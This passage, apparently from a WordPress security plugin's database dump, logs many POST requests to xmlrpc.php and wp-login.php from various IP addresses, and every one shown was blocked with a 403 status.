Safari\\/537.36\"}','HD8pyPsIfwAxcVeZO9BQE6l7',0,1681898072.5925,561,'','POST',403,0,515,0,1,'',0),('139.59.13.196',2335903172,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','sY3CwaAim8E7RZrkDdvPX20f',0,1681898077.1947,565,'','POST',403,0,515,0,1,'',0),('3.105.98.228',57238244,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','djMagZUkR5SKYsC2LJhu6lFT',0,1681898079.4945,611,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','7NfJqLjbz9uW3Ormn5xYty0I',0,1681898081.2725,621,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','psuPf5KMetBqbmZwnc6GFAg0',0,1681898087.6364,617,'','POST',403,0,515,0,1,'',0),('85.95.238.59',1432350267,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','TGd2e7jhgZFQOU39nYkmrNtM',0,1681898093.9024,1955,'','POST',403,0,515,0,1,'',0),('162.0.229.50',2717967666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','7u8IACm3UioDKlHhqkjpSy2t',0,1681898095.0543,2312,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','6f78AibDQuOjKECGgkVWUmqz',0,1681898095.4579,2068,'','POST',403,0,515,0,1,'',0),('68.178.224.2',1152573442,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.93 Safari\\/537.36\"}','5z8jqca0ZE1WFOe2DMltRUKs',0,1681900710.3961,3759,'','POST',403,0,515,0,1,'',0),('161.35.227.188',2703483836,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:38.0) Gecko\\/20100101 Firefox\\/38.0\"}','u2VprPzTLJdkOM5AtxCGwQDX',0,1681900713.7655,856,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','4yg83jBmHSJNALFV9elsG0xR',0,1681900722.7387,586,'','POST',403,0,515,0,1,'',0),('154.204.57.23',2597075223,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','wyEGS10lfeaiDqkcA8QsdZKo',0,1681900726.7813,590,'','POST',403,0,515,0,1,'',0),('37.139.20.103',629871719,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','yFxE69dj428lL5fDR0qzXPpv',0,1681900735.9516,580,'','POST',403,0,515,0,1,'',0),('43.155.116.117',731608181,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','SnqU1HiBLNjFPGQ6kAl7mgMt',0,1681900738.2695,563,'','POST',403,0,515,0,1,'',0),('198.54.126.8',3325459976,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','DvM61EiAt8xouXra2b9JOmG7',0,1681900741.9621,623,'','POST',403,0,515,0,1,'',0),('46.38.249.174',774306222,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 11_4) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','y1KgPLGh2oRXAjJZlirVQvB6',0,1681900754.2416,580,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','jVExW8OpPS2ysU97bYt3v0DL',0,1681900755.9923,596,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','qbfz3ywkPVLWhZHSEc8QeX4I',0,1681900756.8796,562,'','POST',403,0,515,0,1,'',0),('185.141.215.15',3113080591,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','onqzVaey86SEJmWOk2j9x5sh',0,1681902121.6792,601,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/44.0.2403.157 Safari\\/537.36\"}','CfLr8iVxytmg7vZqMTUYN2QS',0,1681902123.7438,1576,'','POST',403,0,515,0,1,'',0),('46.183.216.163',783800483,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','kbmNoK87xlSM1FAJ6OnRzZ0q',0,1681902373.6667,3586,'','POST',403,0,515,0,1,'',0),('68.235.48.108',1156264044,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','jy6nuxCdREKfia8PLSleHU5q',0,1681904863.9241,3766,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:61.0) Gecko\\/20100101 Firefox\\/61.0\"}','LeZBo9QlqwxaGzDjmMUA2grC',0,1681905414.8674,3518,'','POST',403,0,515,0,1,'',0),('79.132.192.238',1334100206,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','tuOiy957s0xIFzeTo1XknK28',0,1681905439.4624,992,'','POST',403,0,515,0,1,'',0),('43.204.117.186',734819770,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','ieSbYw6ncAGLRZ8NsFhKIECX',0,1681905439.9659,881,'','POST',403,0,515,0,1,'',0),('109.234.164.49',1844094001,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','g0RT5aOoUvNDQsukAn4Ei3ez',0,1681905455.4188,551,'','POST',403,0,515,0,1,'',0),('199.59.90.4',3342555652,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','LtJg7vxo2YV3enPrEwZymMWf',0,1681905459.5980,559,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','GeLf37qS9FZWAorBn40xb8IV',0,1681905466.0062,599,'','POST',403,0,515,0,1,'',0),('198.54.126.2',3325459970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','THmGgaO4VFpM6L7oDr5ZAEb3',0,1681905477.4999,601,'','POST',403,0,515,0,1,'',0),('208.109.74.59',3496823355,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-A205U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','0RVanEioxwPdUCNmY8GlSpgy',0,1681905479.5245,527,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','TuXsHS8bBhOIzPy6DqYecMo2',0,1681905483.0600,612,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','UuNWb74zwSTGfgD2Zs5OMHiq',0,1681906308.4422,1797,'','POST',403,0,515,0,1,'',0),('202.87.31.188',3394707388,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','EdzewpmPFxRJ5aiZYc4VHuo0',0,1681906310.5067,607,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','blHEV4z7Radmc63vKON1QSpr',0,1681906315.5766,994,'','POST',403,0,515,0,1,'',0),('82.130.0.72',1384251464,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','mIES7en91vubRVQZiODgdL2X',0,1681906316.0789,932,'','POST',403,0,515,0,1,'',0),('91.204.46.73',1540107849,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','eSUyMhNacGVvDtuI3spPKL70',0,1681906318.5781,622,'','POST',403,0,515,0,1,'',0),('198.71.235.55',3326602039,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','KWNmup9PznkdgXva0oLFGAMI',0,1681906320.0240,583,'','POST',403,0,515,0,1,'',0),('109.94.209.234',1834930666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','5F8l4Kd9iNfQEAgGe6hqzSwa',0,1681906325.3024,571,'','POST',403,0,515,0,1,'',0),('198.54.124.210',3325459666,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','JF0vms1zuaP59lUZIbxBgit4',0,1681906333.0313,551,'','POST',403,0,515,0,1,'',0),('47.242.62.161',804404897,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','KgkUM1yYSIsPfAtjHeCh3Zu7',0,1681906340.8288,602,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/68.0.3440.106 Safari\\/537.36\"}','mvXPgbfaGHw5otLE0ld7DTJr',0,1681906345.1867,1453,'','POST',403,0,515,0,1,'',0),('185.98.5.232',3110209000,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','vX6DiFEoP0OIz4cYnV8GaLNC',0,1681906345.5543,1244,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','N8y4DhziodpvAlXZJY7ae0sG',0,1681906356.8237,604,'','POST',403,0,515,0,1,'',0),('217.64.127.195',3644882883,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','FzS5nMrD48UbpiEaBVhRe10O',0,1681907502.7663,3671,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko\\/20100101 Firefox\\/50.0\"}','AxP1i35cKFjpf7otdeW4Na2B',0,1681909477.5650,1438,'','POST',403,0,515,0,1,'',0),('5.39.4.40',86443048,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko\\/20100101 Firefox\\/43.0\"}','OzXFxK6k5iyu0tS47ZUIh1JB',0,1681909481.7967,707,'','POST',403,0,515,0,1,'',0),('173.231.207.89',2917650265,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','85zb39uiFTRHCp0EoYSZmltj',0,1681909485.0782,597,'','POST',403,0,515,0,1,'',0),('49.50.84.123',825382011,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','RX3SKPZw7IsAJqMnEkc4Qv6t',0,1681909486.1925,663,'','POST',403,0,515,0,1,'',0),('103.154.184.198',1738193094,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','O7tbneTpRqK6WsNdUZyAv4r0',0,1681909490.7623,1483,'','POST',403,0,515,0,1,'',0),('185.208.164.126',3117458558,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','dCByKA81fEFzouXOhtGsxQb3',0,1681909502.0048,729,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','aYrbmJeoczK4uRfCNwFt9pnB',0,1681909504.2032,1478,'','POST',403,0,515,0,1,'',0),('103.169.35.181',1739137973,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko\\/20100101 Firefox\\/60.0\"}','Q1FiUtsdqfNKhY5OwELTnHlp',0,1681909504.5791,1368,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','N1dR5BUmJjikl2obLXnYOPpV',0,1681910772.9526,3794,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko\\/20100101 Firefox\\/44.0\"}','ueHf42bDZW3swcqkayzUYpAJ',0,1681910776.9858,569,'','POST',403,0,515,0,1,'',0),('162.0.232.58',2717968442,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; SM-N960U) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','Q6DS4jht5WsEVoyBvaCLceXM',0,1681910781.9049,690,'','POST',403,0,515,0,1,'',0),('159.89.203.225',2673462241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','Yhxoew0LVzPJicQp9kv5qgmn',0,1681910794.3532,624,'','POST',403,0,515,0,1,'',0),('164.132.84.209',2760135889,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; rv:17.0) Gecko\\/20100101 Firefox\\/20.6.14\"}','8cDbCjBYhxaSQr6oiMHd2Kmg',0,1681910798.5672,779,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','CnpWUeYcrZLfxT4BSzkh0V58',0,1681910799.4032,708,'','POST',403,0,515,0,1,'',0),('185.182.56.150',3115726998,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','oRvqMPIG0BQk2Oy6HL5xpi8D',0,1681910803.5019,1157,'','POST',403,0,515,0,1,'',0),('69.49.247.110',1160902510,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','aVTkCvqoEYnrxsFK036SjtHW',0,1681910803.9726,1004,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','s8knZT95ofK7BctyvOpIVeW0',0,1681910808.5143,593,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','y18Vv6RN9Xq7fdenbploTPtG',0,1681910813.3662,678,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','5K2hREJbgy7Sp1HNCUBxPAtk',0,1681910817.8986,564,'','POST',403,0,515,0,1,'',0),('149.127.214.172',2508183212,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:7.0.1) Gecko\\/20100101 Firefox\\/7.0.1\"}','1xuUEZnhs3QIrzBJXcRVMiNd',0,1681910823.8408,729,'','POST',403,0,515,0,1,'',0),('161.97.187.66',2707536706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','5xyozMl9qubN7HU8DvYdOnmf',0,1681912503.4871,1783,'','POST',403,0,515,0,1,'',0),('208.109.61.155',3496820123,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/46.0.2490.71 Safari\\/537.36\"}','cmk0t8SEbp9I17C4j6UZOLvg',0,1681912501.0248,4839,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:40.0) Gecko\\/20100101 Firefox\\/40.0\"}','PkVxgK1MGWC6YrRJ2e0FmIjN',0,1681912510.2214,842,'','POST',403,0,515,0,1,'',0),('212.85.102.40',3562366504,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:66.0) Gecko\\/20100101 Firefox\\/66.0\"}','tK0PGVduUHnlFSNbZkxpjqoc',0,1681912510.8402,796,'','POST',403,0,515,0,1,'',0),('161.97.187.66',2707536706,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','ycwKzf6AdGQUTVkub4elagps',0,1681912512.4380,609,'','POST',403,0,515,0,1,'',0),('5.135.143.169',92770217,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.113 Safari\\/537.36\"}','oKhLIsPn0CUVdr4x2J1cbWzf',0,1681912518.9548,571,'','POST',403,0,515,0,1,'',0),('207.55.248.19',3476551699,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko\\/20100101 Firefox\\/45.0\"}','xl2HG9KwrAmYQpdTigb4Jcn1',0,1681912526.6723,577,'','POST',403,0,515,0,1,'',0),('95.167.178.158',1604825758,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','nUINkF5Rly6zJ9mCgHGtPXjv',0,1681912527.3954,586,'','POST',403,0,515,0,1,'',0),('163.172.168.158',2746001566,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','tDzyLXU5ZF1Jxu0kS9p7BRmH',0,1681912528.9477,556,'','POST',403,0,515,0,1,'',0),('65.109.24.229',1097668837,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko\\/20100101 Firefox\\/18.0\"}','rFKYbXmZRkepuvQLn9o8SafA',0,1681912532.3161,1299,'','POST',403,0,515,0,1,'',0),('54.36.174.113',908373617,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','mGCi84u3VJRMlKzxrWTE1nOe',0,1681912537.9775,589,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','GhAqdmDMYTI3BWgCKUwz86Rc',0,1681912551.6993,592,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Linux x86_64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','l0sVgF2um5xb6azMwtPkjUXR',0,1681915398.2307,633,'','POST',403,0,515,0,1,'',0),('159.89.203.225',2673462241,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.132 Safari\\/537.36\"}','PAtElcuLy82wkZbGJOhRgjm9',0,1681915409.2806,698,'','POST',403,0,515,0,1,'',0),('217.26.127.250',3642392570,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.135 Safari\\/537.36\"}','KA9jBqxFJ0vNb63fIzHMd4Vc',0,1681915412.0275,604,'','POST',403,0,515,0,1,'',0),('198.38.91.22',3324402454,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.5) Gecko\\/20041107 Firefox\\/1.0\"}','gRFfjnYcLt0WiOCmkuhNpDIo',0,1681915415.1306,587,'','POST',403,0,515,0,1,'',0),('18.218.139.173',316312493,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','qmhFQ5ypMA2fnGgCLOU1ve67',0,1681915422.5371,624,'','POST',403,0,515,0,1,'',0),('205.185.124.254',3451485438,'','https://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.143 Safari\\/537.36\"}','pyICMVlDvOkjbnqiU3m0JAF4',0,1681916114.6788,554,'','POST',403,0,600,0,1,'',0),('205.185.124.254',3451485438,'','https://cmdev-site1.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/36.0.1985.125 Safari\\/537.36\"}','jn5eFQ8Jmfk9asxVXHpRd0GN',0,1681916158.0166,508,'','POST',403,0,600,0,1,'',0),('51.195.124.72',868449352,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 